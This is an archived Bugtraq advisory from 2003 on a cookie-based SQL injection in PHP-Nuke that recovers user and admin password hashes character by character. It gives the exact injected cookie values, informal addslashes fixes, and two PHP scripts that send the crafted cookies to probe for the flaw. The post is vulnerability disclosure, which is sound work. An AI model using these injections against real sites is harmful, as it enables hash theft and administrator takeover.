Php-Nuke:users and admins password hashes vulnerability

From: bugsman (bugsman_at_libero.it)
Date: 05/30/03

  • Next message: Holger Zimmermann: "Re: Unix Version of the Pi3web DoS"
    Date: Fri, 30 May 2003 19:18:50 +0200
    To: bugtraq <bugtraq@securityfocus.com>
    
    

    BUGSMAN: serving security from Italy since..hem..well, about 1 year ------------------------------------------------------------------------------------- Object: users & admins password hash retrieving Tested on Php-Nuke 5.6 e 6.5 Vulnerable versions: I've never seen a patch for this so potentially all versions could be vulnerable... ------------------------------------------------------------------------------------- Description: An attacker can obtain password hashes for users and admins, using a particular SQL injection with cookies. An incredible amount of sites are vulnerable to these attacks. Note: Since the SQL injection works with cookies, this problem is not prevented by turning GPC_magic_quotes on. ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< USER HASH: To get the password hash of an user, the attacker just needs a valid account... The attacker visits www.victimsite.com/modules.php?name=Your_Account sending a spoofed user cookie crafted in this way: uid should be: ' or (uname='username_to_hack' and pass like 'a%') or uname = 'valid_username uname should be: username_to_hack pass should be: valid_password Next stepis to examine the result page. If the page is the login page (the one with textboxes) it means that the hash of the password to crack is really LIKE 'a%' and the attacker can go on with the next character. If the page is the details page for the username_to_hack, then it's time to try LIKE 'B%'... In max 512 guesses the attacker has the hash of username_to_hack and now it is possible to create a spoofed cookie to be recognized as username_to_hack. ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< ADMIN HASH: To get the password hash of an admin, the attacker only needs to know the name of that admin, and needs that the Web_Links module should be active and with at least one link: NOTE: The attacker doesn't need a valid account, and can exploit the bug even if the Web_Links module is active only for registered members... The attacker visits www.victimsite.com/modules.php?name=Web_Links&l_op=viewlink&cid=2 sending a spoofed admin cookie crafted in this way: aid should be: admin_to_hack' and pwd like 'a% pwd should be: anything you want Now the attacker examine the page: if the links have the Edit links active, it means the password hash is really LIKE 'a%' so go on with next character, otherwise go on with LIKE 'b%' NOTE: This trick works with some modification, with l_op=MostPopular and l_op=NewLinksDate too. With the hash the attacker can spoof a cookie and get into the admin section of the site. IMPORTANT NOTE: it is not really a problem to obtain the name of an admin, since the name of the God admin can be obtained just using this exploit with different injections. So what the attacker REALLY needs is the Web_Links module active and with at least one link!!!AND NOTHING MORE!!! ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< QUICK-AND-DIRTY FIX: Since I contacted Francisco Burzi, but I didn't get any response I post a quick-and-dirty fix right out of my brain :) DISCLAIMER: I TAKE NO RESPONSABILITY FOR ANY KIND OF DAMAGE OR MISWORKING OF THE SITE CAUSED BY MY FIXES. THESE ARE NOT OFFICIAL PHP-NUKE FIXES SO APPLY THEM AT YOUR OWN RISK! ANOTHER NOTE: I FIX MY PHP-NUKE THIS WAY AND IT WORKS, IT SHOULD WORK FOR YOU TOO.... FIXING USER EXPLOIT: in file /mainfile.php, in function is_user, before the line: if ($uid != '' AND $pwd != '') add this line: $uid=addslashes($uid); FIXING ADMIN EXPLOIT: in file /modules/Web_Links/index.php, in functions NewLinksDate, MostPopular and viewlink before the line: $admin=explode(":",$admin); add this line: $admin=addslashes($admin); then change this line: $result3=sql_query("select radminlink,radminsuper from ".$prefix."_authors where aid ='$aid'", dbi); and make it look like this one: $result3=sql_query("select radminlink,radminsuper from ".$prefix."_authors where aid='$aid' and pwd='$admin[1]'", dbi); NOTE: YOU HAVE TO DO THIS FOR ALL THE 3 FUNCTIONS LISTED BEFORE!!! ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< ARE YOU WEAK? Here you can find two php pages that you can use to find out if your site is vulnerable to this attack. Just upload the pages on the webserver running php-nuke in the same directory for your config.php and open them. NOTE:THESE SCRIPT ARE VERY POOR-CODED, AND I DO NOT ASSURE THAT THEIR RESPONSE IS RIGHT! THEY WORKED FOR ME AND I HOPE THEY WORK FOR YOU TOO! SORRY FOR THE POOR CODING BUT THE SCRIPTS WERE MADE IN HALF AN HOUR :) NOTE: BEFORE YOU EXECUTE THE SCRIPT, BE SURE TO PERSONALIZE THE VALUES WHERE INDICATED!!! This one is to check the user vulnerability: ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< <?php //Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!! //This one checks for the user password hash retrieving vulnerability //Note: adjust the script execution time in your php.ini if the script //takes too long $server="localhost"; $script="/modules.php?name=Your_Account"; $validaccount="account";// <---Put a valid username here!!! $validpass="password"; // <---Put the password for the above username here!!! $account_to_hack="pippo";//<--- Put another valid username here!!! $md5char[0]="0"; $md5char[1]="1"; $md5char[2]="2"; $md5char[3]="3"; $md5char[4]="4"; $md5char[5]="5"; $md5char[6]="6"; $md5char[7]="7"; $md5char[8]="8"; $md5char[9]="9"; $md5char[10]="a"; $md5char[11]="b"; $md5char[12]="c"; $md5char[13]="d"; $md5char[14]="e"; $md5char[15]="f"; $found=0; $md5reg=""; function sendToHost($host,$method,$path,$cook) { $buf=""; $method = strtoupper($method); $fp = fsockopen($host,80); fputs($fp, "$method $path HTTP/1.1\n"); fputs($fp, "Host: $host\n"); fputs($fp, "Connection: close\n"); fputs($fp, "Pragma: no-cache\n"); fputs($fp, "Cache-control: no-cache\n"); fputs($fp, "Cookie: user=$cook; lang=italian\n"); fputs($fp, "\n\n"); while (!feof($fp)) $buf .= fgets($fp,128); fclose($fp); return $buf; } if (!isset($charindex)) $charindex=0; $found=0; while($charindex<16){ $md5reg="$md5char[$charindex]%"; $uid="' or (uname = '$account_to_hack' and pass like '$md5reg') or uname = '$validaccount"; $validpass=md5("$validpass"); $cookie=base64_encode("$uid:$account_to_hack:$validpass"); $cookie=str_replace("=","%3D",$cookie); $data=sendToHost("$server","get","$script","$cookie"); if (eregi("Password",$data)){ $found += 1; $charindex += 1; } else{ $charindex += 1; Header("Location: ".$PHP_SELF."?charindex=$charindex&charfound=$charfound&curmd5=$curmd5"); } } echo "Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!<br>"; echo "This one check for the user password hash retrieving vulnerability...<br>"; if($found==16) echo "You are NOT vulnerable<br>"; else echo "You are vulnerable!<br>Apply a fix ASAP<br>"; echo "BUGSMAN: serving security from Italy since...hem, well, about 1 year :)<br>"; ?> ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< And this one is to check the admin vulnerability: ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< <?php //Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!! //This one checks for the admin password hash retrieving vulnerability //Note: adjust the script execution time in your php.ini if the script //takes too long $server="localhost"; $script="/modules.php?name=Web_Links&l_op=viewlink&cid=1";//<---put a cid that shows a page with links in it $account_to_hack="admin";//<--- Put the admin username here!!! $md5char[0]="0"; $md5char[1]="1"; $md5char[2]="2"; $md5char[3]="3"; $md5char[4]="4"; $md5char[5]="5"; $md5char[6]="6"; $md5char[7]="7"; $md5char[8]="8"; $md5char[9]="9"; $md5char[10]="a"; $md5char[11]="b"; $md5char[12]="c"; $md5char[13]="d"; $md5char[14]="e"; $md5char[15]="f"; $found=0; $md5reg=""; function sendToHost($host,$method,$path,$cook) { $buf=""; $method = strtoupper($method); $fp = fsockopen($host,80); fputs($fp, "$method $path HTTP/1.1\n"); fputs($fp, "Host: $host\n"); fputs($fp, "Connection: close\n"); fputs($fp, "Pragma: no-cache\n"); fputs($fp, "Cache-control: no-cache\n"); fputs($fp, "Cookie: admin=$cook; lang=italian\n"); fputs($fp, "\n\n"); while (!feof($fp)) $buf .= fgets($fp,128); fclose($fp); return $buf; } if (!isset($charindex)) $charindex=0; $found=0; while(($charindex<16)&&($found==0)){ $md5reg="$md5char[$charindex]%"; $aid="$account_to_hack' and pwd like '$md5reg"; $validpass=md5("useless_pass"); $cookie=base64_encode("$aid:$validpass"); $cookie=str_replace("=","%3D",$cookie); $data=sendToHost("$server","get","$script","$cookie"); if (eregi("Edit",$data)){ $found += 1; $charindex += 1; } else{ $charindex += 1; // echo "$data"; Header("Location: ".$PHP_SELF."?charindex=$charindex"); } } echo "Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!<br>"; echo "This one check for the admin password hash retrieving vulnerability...<br>"; if($found==0) echo "You are NOT vulnerable<br>"; else echo "You are vulnerable!<br>Apply a fix ASAP<br>"; echo "BUGSMAN: serving security from Italy since...hem, well, about 1 year :)<br>"; ?> ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< For any suggestion, comments, hiring (I need money too) or any other thing, contact me at: bugsman@libero.it See ya!!!!


  • Next message: Holger Zimmermann: "Re: Unix Version of the Pi3web DoS"

    Relevant Pages

    • PHPNuke SQL Injection
      ... With the hash, an attacker may login ... The bug exists in the search engine included with PHPnuke ... Any md5 password hash can be fished in less than 512 guesses. ... It would check the admin table to see if the first character in the pwd ...
      (Bugtraq)
    • SEC Consult SA-20141029-0 :: Multiple critical vulnerabilities in Vizensoft Admin Panel
      ... SEC Consult Vulnerability Lab Security Advisory ... product: Vizensoft Admin Panel ... Vizensoft is one of the major software vendors, ... an attacker gains access to all records ...
      (Bugtraq)
    • Multiple vulnerabilities in OSClass
      ... Remote file inclusion in osc_downloadFile. ... An attacker must be logged as admin to exploit this vulnerability. ... An attacker must be logged as admin to exploit this vulnerability; ...
      (Bugtraq)
    • Re: Simple method to block outgoing traffic
      ... build our own installer (which then in turn might run with admin rights). ... MAXIMUM_ALLOWED in all fopencalls and replacing all HKLM with HKCU ... You're not a programmer that's obvious ... the AdobeLM vulnerability since years, we had to take our own measures. ...
      (comp.security.firewalls)
    • Pixel Post Multiple Vulnerabilities
      ... XSS, and SQL Injection providing full access to admin area, providing upload any type of files capabilities.. ... With this vulnerability we can fetch almost any data from the database, ... You can perform a XSS attack when commenting a post because the comment, the name, the url, and nor the email are properly sanitized. ...
      (Bugtraq)